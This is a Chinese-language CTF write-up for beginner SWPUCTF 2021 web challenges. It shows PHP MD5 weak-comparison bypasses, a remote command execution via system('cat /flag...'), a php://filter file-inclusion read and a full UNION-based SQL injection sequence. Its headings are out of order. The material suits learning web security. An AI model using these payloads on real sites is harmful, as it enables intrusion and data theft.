一、Problem: [SWPUCTF 2021 新生赛]easy_md5
思路
- POSt、GET
- PHP弱类型的md5绕过
EXP
PHP弱相等将两边都视为0,成功绕过
总结
- 对该题的考点总结
例如: name = s878926199a md5(name) = 0e545993274517709034328855841020 password = s155964671a md5(password) = 0e342768416822451524974117254469
- 既要两变量个值不相同,又要两个变量md5值一样,
可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
方法一: 可以使用带0e开头的数字穿进行传递参数,因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;
方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null
另:若遇到===这样的强类型比较,方法一就失效了,方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同
二、
Problem: [SWPUCTF 2021 新生赛]jicao
- 知识点:网站请求的POST、GET方法,JSON
阅读源码了解到需要post值给id,get值给json,json_decode()可以对一串JSON进行解码,故需要构造payload为 {"x":"wllm"}之后:
方法一:使用HackBar进行/?id=wllmNB,然后post json
方法二:使用burp直接修改请求头
另:json
JSON(JavaScript Object Notation, JS对象简谱)是一种轻量级的数据交换格式。它基于 ECMAScript(European Computer Manufacturers Association, 欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
JSON的值:
3.1 JSON的构成: ws 值
3.2值可以是对象、数组、数字、字符串或者三个字面值(false、null、true)中的一个。值中的字面值中的英文必须使用小写。
3.2.1对象由花括号括起来的逗号分割的成员构成,成员是字符串键和上文所述的值由逗号分割的键值对组成,如:
{"name": "John Doe", "age": 18, "address": {"country" : "china", "zip-code": "10000"}}
引用JSON中的对象可以包含多个键值对,并且有数组结构,该语言正是一次实现过程内容的描述。
3.2.2数组是由方括号括起来的一组值构成,如:
[3, 1, 4, 1, 5, 9, 2, 6]
3.2.3 字符串与C或者Java的字符串非常相似。字符串是由双引号包围的任意数量Unicode字符的集合,使用反斜线转义。一个字符(character)即一个单独的字符串(character string)。
3.2.4数字也与C或者Java的数值非常相似。除去未曾使用的八进制与十六进制格式。除去一些编码细节。
思路
hackbar构造payload:?json={“x”:“wllm”},同时POST:id=wllmNB
三、
Problem: [SWPUCTF 2021 新生赛]gift_F12
思路
- 解题大致思路
EXP
- 具体攻击代码
总结
思路
EXP
直接传参url=system(“ls /”);
由题查看根目录下文件,查看f…/?url=system(“cat /flllllaaaaaaggggggg”);
得到flag
总结
五、
- 对该题的考点总结
- f12查看源码挨个查找即可(CTRL+f进行关键词查找)
- 四、Problem: [SWPUCTF 2021 新生赛]easyrce
- 思路
- EXP
- 总结
- 解题大致思路
- rce回显与命令执行
- 对该题的考点总结
Problem: [SWPUCTF 2021 新生赛]include
思路
EXP
Base64解码可得
总结
上传file文件,参数为php://filter/convert.base64-encode/resource=flag.php
六、
- PHP伪协议与文件包含
- 上传file文件/?file=…参数任意
- 发现有include_once函数;
- 对该题的考点总结
- include_once():在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。
Problem: [SWPUCTF 2021 新生赛]easy_sql
来自
2022-10-03 19:08 By showmi
注意闭合和注释
判断字段:
?wllm=-1' order by 3--+
查看回显点:
?wllm=-1' union select 1,2,3--+
查寻库名:
?wllm=-1' union select 1,2,database()--+
//test_db
查询表明
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
//test_tb,users
查询字段名
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
//flag
查询flag表里面内容
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
思路
解题大致思路
EXP
- 具体攻击代码
- 对该题的考点总结